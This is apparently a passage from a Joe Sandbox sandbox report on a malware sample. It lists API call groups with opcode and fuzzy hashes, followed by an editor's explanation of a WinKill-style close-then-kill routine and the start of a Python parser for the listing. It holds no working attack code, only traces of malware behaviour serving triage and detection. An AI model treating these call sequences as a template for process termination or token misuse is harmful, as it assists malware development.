• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A41DC0
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A41DE1
• WSAGetLastError.WSOCK32 ref: 00A41DF2
• htons.WSOCK32(?,?,?,?,?), ref: 00A41EDB
• inet_ntoa.WSOCK32(?), ref: 00A41E8C
  • Part of subcall function 00A239E8: _strlen.LIBCMT ref: 00A239F2
  • Part of subcall function 00A43224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00A3EC0C), ref: 00A43240
• _strlen.LIBCMT ref: 00A41F35
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
• String ID:
• API String ID: 3203458085-0
• Opcode ID: 19654477c7de6d45f25c119e92b5e49431080b0ceefe825c5b11ab86f05c3c2f
• Instruction ID: a900cc11b316dbf5f6a7f1b5abee7ec3f06faad5cefc9a152cf59ee2ce4ac245
• Opcode Fuzzy Hash: 19654477c7de6d45f25c119e92b5e49431080b0ceefe825c5b11ab86f05c3c2f
• Instruction Fuzzy Hash: F7B1CD39604340AFC324DF24C895F2A7BA5AFC4318F54894DF45A5B2E2DB71ED86CB92

APIs
• GetClientRect.USER32(?,?), ref: 009C5D30
• GetWindowRect.USER32(?,?), ref: 009C5D71
• ScreenToClient.USER32(?,?), ref: 009C5D99
• GetClientRect.USER32(?,?), ref: 009C5ED7
• GetWindowRect.USER32(?,?), ref: 009C5EF8
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: 33a953fc9bad7bdff6a9c2dd7e58428942d52dfc034beedb8eca3313bcf39f62
• Instruction ID: 2133c070e327cebc9083dd3e85ce9f1d2f55e5bcd5523dffd4d4f779b33e01c1
• Opcode Fuzzy Hash: 33a953fc9bad7bdff6a9c2dd7e58428942d52dfc034beedb8eca3313bcf39f62
• Instruction Fuzzy Hash: 55B16A74A0074ADBDB14CFA8C480BEAB7F1BF58310F14881AE8A9D7294D734AA91DB51

APIs
• __allrem.LIBCMT ref: 009F00BA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009F00D6
• __allrem.LIBCMT ref: 009F00ED
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009F010B
• __allrem.LIBCMT ref: 009F0122
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009F0140
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
• Instruction ID: 6d83fda93c773b68462c7e3a679fdf52a875278de0e7c25f28254b384f15110c
• Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
• Instruction Fuzzy Hash: 2181E672B00B0A9BE7219F69CC51B7A73EDEF81724F24453AF651D6682EB70DD008B50

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009E82D9,009E82D9,?,?,?,009F644F,00000001,00000001,8BE85006), ref: 009F6258
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009F644F,00000001,00000001,8BE85006,?,?,?), ref: 009F62DE
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009F63D8
• __freea.LIBCMT ref: 009F63E5
  • Part of subcall function 009F3820: RtlAllocateHeap.NTDLL(00000000,?,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6,?,009C1129), ref: 009F3852
• __freea.LIBCMT ref: 009F63EE
• __freea.LIBCMT ref: 009F6413
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 4ed47ea5dcab834b2a90f225a045049738748f06bace5ad4bbfb799bbee46e9a
• Instruction ID: 9c915a6c766733d21bb0f96ed3f08f69a32520caa420762abfe7edb788ee49f7
• Opcode Fuzzy Hash: 4ed47ea5dcab834b2a90f225a045049738748f06bace5ad4bbfb799bbee46e9a
• Instruction Fuzzy Hash: 6F51DF72A0031AABEB258F64CC81FBF77AAEB94760F154629FA05D7140DB74DC44C7A0

APIs
  • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
  • Part of subcall function 00A4C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A4B6AE,?,?), ref: 00A4C9B5
  • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4C9F1
  • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4CA68
  • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A4BCCA
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A4BD25
• RegCloseKey.ADVAPI32(00000000), ref: 00A4BD6A
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A4BD99
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A4BDF3
• RegCloseKey.ADVAPI32(?), ref: 00A4BDFF
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 1120388591-0
• Opcode ID: 0f82996ccc6c1ce4d2c57ff605407344bcaf45065ec252f08246fb5fc1484cd2
• Instruction ID: d639215aa0bc5b7aa8c5ee623c848c7c965b199e5ab65e8e75dae41cf791f747
• Opcode Fuzzy Hash: 0f82996ccc6c1ce4d2c57ff605407344bcaf45065ec252f08246fb5fc1484cd2
• Instruction Fuzzy Hash: 4A816C34618241AFD714DF24C895E2ABBE5FFC4318F14899CF4594B2A2DB31ED45CBA2

APIs
• VariantInit.OLEAUT32(00000035), ref: 00A1F7B9
• SysAllocString.OLEAUT32(00000001), ref: 00A1F860
• VariantCopy.OLEAUT32(00A1FA64,00000000), ref: 00A1F889
• VariantClear.OLEAUT32(00A1FA64), ref: 00A1F8AD
• VariantCopy.OLEAUT32(00A1FA64,00000000), ref: 00A1F8B1
• VariantClear.OLEAUT32(?), ref: 00A1F8BB
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: Variant$ClearCopy$AllocInitString
• String ID:
• API String ID: 3859894641-0
• Opcode ID: d4b78ec3dd1b68983370a77d8469ef06068acee1b7fba0cf703e2ce2fa3c2303
• Instruction ID: 613fc56f2b1c4a11272abb5bb5d2f21ac6553de4f0a0886610ba59ee78e61b63
• Opcode Fuzzy Hash: d4b78ec3dd1b68983370a77d8469ef06068acee1b7fba0cf703e2ce2fa3c2303
• Instruction Fuzzy Hash: 2B51C735500390BFCF10AB65D895BA9B3B9EF45710F24846BF806DF295DB708C80CB96

APIs
  • Part of subcall function 009C7620: _wcslen.LIBCMT ref: 009C7625
  • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
• GetOpenFileNameW.COMDLG32(00000058), ref: 00A394E5
• _wcslen.LIBCMT ref: 00A39506
• _wcslen.LIBCMT ref: 00A3952D
• GetSaveFileNameW.COMDLG32(00000058), ref: 00A39585
Strings
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: _wcslen$FileName$OpenSave
• String ID: X
• API String ID: 83654149-3081909835
• Opcode ID: ee631019b7e0465f687e702c8b503d8a322d20e7d3fe84730f56004690e6c61f
• Instruction ID: d8b51d059d8ac962ffb958bafaf98d81d451af176eab10800d71809e77624743
• Opcode Fuzzy Hash: ee631019b7e0465f687e702c8b503d8a322d20e7d3fe84730f56004690e6c61f
• Instruction Fuzzy Hash: 2DE17B71A083409FD724EF24C885F6AB7E4BF84314F04896DF8999B2A2DB71DD45CB92

APIs
  • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
• BeginPaint.USER32(?,?,?), ref: 009D9241
• GetWindowRect.USER32(?,?), ref: 009D92A5
• ScreenToClient.USER32(?,?), ref: 009D92C2
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009D92D3
• EndPaint.USER32(?,?,?,?,?), ref: 009D9321
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A171EA
  • Part of subcall function 009D9339: BeginPath.GDI32(00000000), ref: 009D9357
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
• String ID:
• API String ID: 3050599898-0
• Opcode ID: 9ed566b442f2045092ae5bd241658bd0fc5a4f23703a44a7ce96b7f0dd1f1ff5
• Instruction ID: a4f98d113d95cf1fb1f1d62634e2d1717c87c0fc03de78b771d907cb995a3437
• Opcode Fuzzy Hash: 9ed566b442f2045092ae5bd241658bd0fc5a4f23703a44a7ce96b7f0dd1f1ff5
• Instruction Fuzzy Hash: B941B030244301AFD711EFA4DC84FBA7BB8FB45761F14462AFA64972B1C7319846DB61

APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 00A3080C
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00A30847
• EnterCriticalSection.KERNEL32(?), ref: 00A30863
• LeaveCriticalSection.KERNEL32(?), ref: 00A308DC
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00A308F3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00A30921
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
• String ID:
• API String ID: 3368777196-0
• Opcode ID: 9518638517145561d3244f7255b94b258a5521bdbd29f55b25150e2d788d0a1e
• Instruction ID: 4fedb1d12b0eb6a4de78d1b857fec03937c1b6b199ebe0242f5799075b847367
• Opcode Fuzzy Hash: 9518638517145561d3244f7255b94b258a5521bdbd29f55b25150e2d788d0a1e
• Instruction Fuzzy Hash: 94416A71900205EFDF15EF94DC85AAAB7B8FF44310F1480A9FD059A29ADB30DE61DBA0

                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00A1F3AB,00000000,?,?,00000000,?,00A1682C,00000004,00000000,00000000), ref: 00A5824C
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00A58272
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A582D1
                                                                      • ShowWindow.USER32(00000000,00000004), ref: 00A582E5
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00A5830B
                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A5832F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00A24C95
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A24CB2
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A24CEA
                                                                      • _wcslen.LIBCMT ref: 00A24D08
                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A24D10
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00A24D1A
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 72514467-0
                                                                      APIs
                                                                        • Part of subcall function 009C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C3A97,?,?,009C2E7F,?,?,?,00000000), ref: 009C3AC2
                                                                      • _wcslen.LIBCMT ref: 00A3587B
                                                                      • CoInitialize.OLE32(00000000), ref: 00A35995
                                                                      • CoCreateInstance.OLE32(00A5FCF8,00000000,00000001,00A5FB68,?), ref: 00A359AE
                                                                      • CoUninitialize.OLE32 ref: 00A359CC
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 3172280962-24824748
                                                                      APIs
                                                                        • Part of subcall function 00A20FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A20FCA
                                                                        • Part of subcall function 00A20FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A20FD6
                                                                        • Part of subcall function 00A20FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A20FE5
                                                                        • Part of subcall function 00A20FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A20FEC
                                                                        • Part of subcall function 00A20FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A21002
                                                                      • GetLengthSid.ADVAPI32(?,00000000,00A21335), ref: 00A217AE
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A217BA
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00A217C1
                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A217DA
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00A21335), ref: 00A217EE
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A217F5
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 3008561057-0
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A214FF
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00A21506
                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A21515
                                                                      • CloseHandle.KERNEL32(00000004), ref: 00A21520
                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A2154F
                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00A21563
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,009E3379,009E2FE5), ref: 009E3390
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009E339E
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009E33B7
                                                                      • SetLastError.KERNEL32(00000000,?,009E3379,009E2FE5), ref: 009E3409
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,009F5686,00A03CD6,?,00000000,?,009F5B6A,?,?,?,?,?,009EE6D1,?,00A88A48), ref: 009F2D78
                                                                      • _free.LIBCMT ref: 009F2DAB
                                                                      • _free.LIBCMT ref: 009F2DD3
                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,009EE6D1,?,00A88A48,00000010,009C4F4A,?,?,00000000,00A03CD6), ref: 009F2DE0
                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,009EE6D1,?,00A88A48,00000010,009C4F4A,?,?,00000000,00A03CD6), ref: 009F2DEC
                                                                      • _abort.LIBCMT ref: 009F2DF2
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$_abort
                                                                      • String ID:
                                                                      • API String ID: 3160817290-0
                                                                      APIs
                                                                        • Part of subcall function 009D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009D9693
                                                                        • Part of subcall function 009D9639: SelectObject.GDI32(?,00000000), ref: 009D96A2
                                                                        • Part of subcall function 009D9639: BeginPath.GDI32(?), ref: 009D96B9
                                                                        • Part of subcall function 009D9639: SelectObject.GDI32(?,00000000), ref: 009D96E2
                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00A58A4E
                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00A58A62
                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00A58A70
                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00A58A80
                                                                      • EndPath.GDI32(?), ref: 00A58A90
                                                                      • StrokePath.GDI32(?), ref: 00A58AA0
                                                                      Similarity
                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                      • String ID:
                                                                      • API String ID: 43455801-0
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00A25218
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A25229
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A25230
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00A25238
                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A2524F
                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00A25261
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 009C1BF4
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 009C1BFC
                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009C1C07
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009C1C12
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 009C1C1A
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009C1C22
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: c407002500a2bbd5898746fe3d60fa32d5f5ad510b18c5b2ce6054823c12cd18
                                                                      • Instruction ID: 51e9c427b8d3cb60cfc0559d9ad52e9a8ea3171e8bf38dc2ac342fbd4367f2aa
                                                                      • Opcode Fuzzy Hash: c407002500a2bbd5898746fe3d60fa32d5f5ad510b18c5b2ce6054823c12cd18
                                                                      • Instruction Fuzzy Hash: E80167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A2EB30
                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A2EB46
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00A2EB55
                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A2EB64
                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A2EB6E
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A2EB75
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      • Opcode ID: e85543da0b3f463bc6ee0f386937fc9765154cbdb5e37769769e220c0f2e2315
                                                                      • Instruction ID: 0c7e86555d45c2b58d94884bdba392e16280a14173a0c667a3ea7e3f78bd8ddf
                                                                      • Opcode Fuzzy Hash: e85543da0b3f463bc6ee0f386937fc9765154cbdb5e37769769e220c0f2e2315
                                                                      • Instruction Fuzzy Hash: 0CF01D72240758BFE62197929C0DEAB7A7CFBCAB22F004158F601D109596A45A4286B5
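The six calls in the block above form one routine: post WM_CLOSE (0x10) to a window, send it again through SendMessageTimeoutW with SMTO_ABORTIFHUNG (0x2) and a 500 ms (0x1F4) timeout, then resolve the owning process with GetWindowThreadProcessId, open it with PROCESS_ALL_ACCESS (0x1F0FFF) and TerminateProcess it. That close-then-kill sequence matches the behaviour of AutoIt's WinKill, which is consistent with the "compiled AutoIt script" verdict in the overview; on its own it is runtime code, not the FormBook payload, and the same reading applies to the CRT and Wow64 helper blocks further down. The Python below is an added example written for this page, not Joe Sandbox, AutoIt or FormBook code: it parses API lines in the format used throughout this listing (including "Part of subcall function" lines and string arguments such as "CorExitProcess"), annotates the constants a triager recognises, and flags the close-then-kill pattern. The constant table is the editor's own; the sample lines are copied from the block above.

```python
"""Parse Joe Sandbox IDA-plugin 'APIs' lines and annotate known constants.

Added example for this report page; the line format is inferred from the
listing itself, and the constant table is the editor's own annotation.
"""
import re

# Win32 constants as they appear in the listing (editor's annotation table).
WM_CLOSE = 0x10
PROCESS_ALL_ACCESS = 0x1F0FFF
SMTO_ABORTIFHUNG = 0x2

# '• Api.MODULE(args), ref: ADDR' or
# '• Part of subcall function ADDR: _func.LIBCMT ref: ADDR'
CALL_RE = re.compile(
    r"^(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)

# Sample input: the WinKill-style block from this report, copied verbatim.
SAMPLE = [
    "• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A2EB30",
    "• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A2EB46",
    "• GetWindowThreadProcessId.USER32(?,?), ref: 00A2EB55",
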